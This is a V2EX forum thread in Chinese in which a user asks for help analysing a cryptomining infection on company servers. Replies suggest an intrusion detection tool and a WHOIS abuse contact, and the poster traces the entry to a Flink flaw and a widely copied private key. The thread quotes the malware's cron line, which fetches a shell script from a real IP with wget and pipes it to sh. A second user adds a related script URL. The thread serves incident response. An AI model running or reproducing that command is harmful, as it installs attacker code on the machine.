公司服务器被攻击了!

2021-11-01 12:42:43 +08:00
 leiuu

周六公司服务器被大面积攻击,植入挖矿程序,cpu 被打爆。

怀疑是通过某个开源框架的远程执行漏洞进来的,但不知道是从具体哪个机器进入。

该病毒基本特征:

* * * * * wget -q -O - http://185.191.32.198/spr.sh |sh > /dev/null 2>&1

涉及的服务器很多,v 友们有什么好的分析思路分享吗?

9289 次点击
所在节点    信息安全
53 条回复
ugorange
2021-11-02 10:32:58 +08:00
推荐一下我们出的开源的 HIDS ,可以监控入侵行为
https://github.com/bytedance/Elkeid
hubahuba
2021-11-02 10:55:47 +08:00
@ugorange 当场抓获!
leiuu
2021-11-02 11:51:00 +08:00
@ugorange 学习了。👍。
dier
2021-11-02 17:33:52 +08:00
我们的是周末 gitlab 版本太老,有漏洞导致 gitlab 的容器被入侵。不过还好只是在容器内部,销毁当前容器重建就好了。然后连夜一路长征升级到了最新版本😌
leiuu
2021-11-02 18:53:56 +08:00
@dier git 可太重要了。备份 N 个都不过分。
dier
2021-11-02 20:05:37 +08:00
@leiuu 是的,就是怕出事,所以每天有定时备份
leiuu
2021-11-02 20:39:02 +08:00
@0x73346b757234 thx 。分享的腾讯系列的文章有帮助。排查了一下这次是利用了 flink 漏洞。补充到附言啦。
leiuu
2021-11-03 19:50:31 +08:00
结帖了。最终发现病毒进一步扩散的主要原因是,是私钥被其他人误操作复制到多台机器,该私钥权限机器很多。
abychan
2021-11-10 21:46:27 +08:00
9 天前我的服务器也被攻击了,http://185.191.32.198/pg.sh ,顺着这个地址找过来了,原因是 postgres 密码被暴力破解
leiuu
2021-11-11 10:33:21 +08:00
@abychan 有点丧心病狂。是开放到外网的 pg ?
loveminds
2021-12-02 06:43:53 +08:00
inetnum: 185.191.32.0 - 185.191.33.255
netname: RU-ITRESHENIYA
country: RU
org: ORG-ITR1-RIPE
admin-c: ITR30-RIPE
tech-c: ITR30-RIPE
status: ASSIGNED PA
mnt-by: IP-RIPE
mnt-routes: MNT-SELECTEL
created: 2020-07-20T05:54:06Z
last-modified: 2021-10-05T19:15:11Z
source: RIPE

organisation: ORG-ITR1-RIPE
org-name: IT Resheniya LLC
org-type: OTHER
address: ul. Novoselov, d. 8A, of. 692
address: 193079 Saint Petersburg
address: Russia
abuse-c: ITR30-RIPE
mnt-ref: IP-RIPE
mnt-by: IP-RIPE
created: 2021-10-05T19:08:37Z
last-modified: 2021-10-05T19:15:03Z
source: RIPE # Filtered

role: IT Resheniya LLC
address: ul. Novoselov, d. 8A, of. 692
address: 193079 Saint Petersburg
address: Russia
abuse-mailbox: abuse(AT)hostway.ru
phone: +7 903 2712822
nic-hdl: ITR30-RIPE
mnt-by: IP-RIPE
created: 2021-10-05T19:08:38Z
last-modified: 2021-10-05T19:08:38Z
source: RIPE # Filtered

直接给 abuse(AT)hostway.ru 丢 abuse ,或者这里提交个工单看看?
https://billing.hostway.ru/index.php?/tickets/&roistat_visit=16278
e583409
2021-12-16 11:49:37 +08:00
@ugorange 感谢 我关注一下
e583409
2021-12-16 11:49:50 +08:00
@ugorange 感谢

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/812098

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX